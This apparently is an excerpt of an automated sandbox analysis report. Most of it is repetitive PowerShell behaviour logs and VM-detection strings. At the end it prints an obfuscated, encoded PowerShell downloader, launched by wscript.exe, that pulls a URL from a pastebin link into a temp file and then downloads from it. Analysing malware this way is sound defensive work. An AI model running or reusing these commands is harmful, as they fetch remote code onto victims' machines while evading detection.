            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34390FC5 sldt word ptr [eax]4_2_00007FFD34390FC5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1754Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1540Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4006Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5751Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4324Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4295Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 4006 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep count: 5751 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep count: 4324 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep count: 4295 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4780Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.2129598783.000001F1066AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
            Source: powershell.exe, 00000004.00000002.2309229890.0000023053043000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
            Source: powershell.exe, 00000007.00000002.2236285577.0000020D7E618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: powershell.exe, 00000004.00000002.2373219888.0000023069B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: PING.EXE, 00000006.00000002.2193420463.000001F70D5C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Encrypted powershell cmdline option found
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G